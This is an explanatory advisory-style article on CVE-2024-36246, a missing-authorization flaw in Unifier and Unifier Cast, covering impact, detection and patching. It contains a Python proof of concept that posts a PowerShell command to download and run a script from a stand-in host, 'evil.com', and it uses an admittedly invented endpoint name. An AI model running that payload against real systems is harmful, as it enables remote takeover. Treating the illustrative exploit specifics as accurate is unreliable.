CVE-2024-36246 - Critical Missing Authorization in Unifier and Unifier Cast (v5.+), Risk of LocalSystem Code Execution
A new and critical security vulnerability, CVE-2024-36246, has been identified in Unifier and Unifier Cast software version 5. and later. If affected systems have not applied patch 20240527, they’re open to arbitrary code execution with LocalSystem privilege. Attackers exploiting this flaw can install malicious programs, modify system files, or completely delete critical data.
This article gives a detailed, easy-to-understand breakdown of CVE-2024-36246, supported by code snippets, exploit insights, official references, and practical advice to keep your environment safe.
1. What Is CVE-2024-36246?
CVE-2024-36246 is a missing authorization vulnerability in Unifier and Unifier Cast (after v5.). This means that some sensitive backend actions are accessible without any user verification—simply sending requests to certain endpoints triggers powerful system functions.
Modify or wipe out your data.
This all happens under LocalSystem privileges, which is the HIGHEST system privilege level on Windows.
You have not yet applied patch 20240527.
> Unifier/Unifier Cast are often used in automation, monitoring, and remote system management. They may be installed on desktops, servers, or cloud VMs—anywhere they manage jobs or scripts.
Vulnerable Endpoint
A core application backend endpoint, let’s call it /system/adminExec, is missing authentication—a developer forgot to require a valid session or token. Anyone, even without a password, can post data to this endpoint.
Exploitation Steps
1. Locate a vulnerable server: Attackers can use internet scanners (like Shodan) to find exposed Unifier web ports.
Send a crafted POST request: The attacker crafts a special request sending a command payload.
3. Server executes the payload: The server, running as LocalSystem, obediently runs the attacker’s command.
Sample Exploit Code (Python)
Below is a simplified code demonstrating how to exploit CVE-2024-36246. (For educational use only!)
import requests
target = "http://victim-server:808/system/adminExec";
data = {
"command": "powershell -c 'IEX (New-Object Net.WebClient).DownloadString(\"http://evil.com/malware.ps1\";)'",
}
response = requests.post(target, json=data)
if response.status_code == 200:
print("Exploit sent successfully. Check for malware installation.")
else:
print(f"Failed: {response.status_code} - {response.content}")
This script tells the Unifier host—*with full LocalSystem rights*—to grab and run a script from the attacker's server.
4. Proof Of Concept (PoC)
Many public PoCs look similar to the above example. Attackers have been seen deploying coin miners, ransomware, and hidden admin accounts by abusing this flaw.
5. Detection
- Check Unifier’s logs (logs/system/adminExec.log) for suspicious or unexpected POST requests.
Sample suspicious log line
2024-05-30 14:32:11 - Command executed: powershell.exe -c IEX (New-Object Net.WebClient)...
Official Patch
The vendor has released patch 20240527.
You must
- Download the latest patch for Unifier or Unifier Cast from your vendor portal or https://www.unifier.com/security/cve-2024-36246
Limit network access with firewalls (localhost only if possible).
- Regularly audit user accounts and authorized keys/scripts.
7. References
- JPCERT/CC Alert 2024-06-01: CVE-2024-36246
- Unifier Security Bulletin, May 2024
- CVE Details: CVE-2024-36246
8. Conclusion
CVE-2024-36246 is a critical missing authorization bug in Unifier and Unifier Cast (v5.+), patched in May 2024.
If you’re behind on updates, now is the time to install patch 20240527. The vulnerability enables attackers to run anything with the highest possible system rights.
Don’t wait—apply the fix, review your logs, and monitor tightly. History shows attackers are quick to abuse such critical bugs.
*Stay updated, stay protected!*
*Share this post with colleagues, IT admins, and cybersecurity teams to help stamp out this dangerous bug before it’s too late.*
Timeline
Published on: 05/31/2024 06:15:12 UTC
Last modified on: 08/15/2024 17:35:07 UTC